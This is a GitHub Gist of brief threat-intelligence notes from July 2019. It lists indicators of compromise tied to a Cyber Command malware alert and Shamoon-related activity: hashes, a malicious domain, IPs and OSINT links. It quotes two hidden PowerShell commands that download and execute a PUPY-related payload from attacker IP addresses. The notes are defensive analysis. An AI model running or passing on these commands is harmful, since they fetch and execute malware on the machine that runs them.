Created
July 2, 2019 20:17
-
-
Save Blevene/3390bef46eaaa684f1b345c5b88c3d0d to your computer and use it in GitHub Desktop.
Cyber July 2nd 2019 Quick Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CyberCom | |
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536 | |
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536 | |
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited)) | |
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet , 2017-01-14 03:35Z | |
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62 | |
> Powershell: http://69.87.223.26:8080/eiloShaegae1 | |
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')" | |
>Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb | |
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2 | |
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell | |
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z | |
> http://139.59.46.154:3485/eiloShaegae1 | |
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')" | |
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai | |
> Downloader for PuPy | |
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/ | |
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector | |
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704